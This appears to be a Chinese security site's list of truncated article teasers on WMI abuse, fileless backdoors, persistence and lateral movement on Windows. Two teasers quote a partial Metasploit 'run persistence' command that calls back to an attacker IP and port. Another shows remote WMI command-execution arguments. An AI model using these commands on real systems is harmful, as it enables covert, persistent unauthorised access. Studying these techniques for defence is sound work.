介绍 欢迎回到“威胁检测与搜寻建模”系列的另一部分。在上一篇文章中,我认为我们在操作级别感知环境中的操作(尤其是当涉及到端点事件时),这意味着我们也应该在操作级别“构思”攻击者的交易技巧。在这篇文章中...
黑客(红队)攻防中内网环境下WMI的利用
WMI简介 WMI,全称Windows Management Instrumentation,是微软开发的一种用于管理Windows系统的工具。你可以把它想象成一个数据库工具,它存储了关于你的电脑的各...
Metasploit 常用维权方式
metasploit 后渗透常用的维持权限的方式. 注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P win...
Windows 单机权限维持
Windows 单机权限维持 注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/me...
wmiexec.vbs
WMI 是一项核心的 Windows 管理技术, 用户可以使用 WMI 管理本地和远程计算机. wmiexec.vbs t00ls 大牛的作品 替代 psexec 通过 wmiexec 可以获取到一个...
【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动
免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。WMI无回显命令执行Win32_Process类中...
内网兵器 - 通过 WMI 协议执行不同的命令执行方式
用于对远程 WMI 实例进行身份验证并通过计划任务执行命令。-i <ip_address> -u <username> -p <password> -c <c...
【权限维持技术】Windows: WMI 无文件后门(二)
免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。WMI 类WMI的数据结构被定义为一种类(Clas...
【权限维持技术】Windows: WMI 无文件后门(三)—— WQL查询
免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。WMI 查询经过前两章的铺垫,我们本章终于可以了解...
【权限维持技术】Windows:WMI 无文件后门(一)
WMI 简介 WMI,全名Windows Management Instrumentation,即Windows管理工具,是Microsoft的一种基于网络的管理服务。其可以帮助用户管理本地和远程计算...
横向移动工具开发:wmiexec-Pro
0x01 Intro 早于两年前,我基于wmihacker免杀横向的思路,造轮子写了个wmipersist-Modify.py的横向工具,相对于wmihacker来说,无需配合mimikatz的PTH...
【A9】certutil,wmic命令执行敏感操作
“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”...
8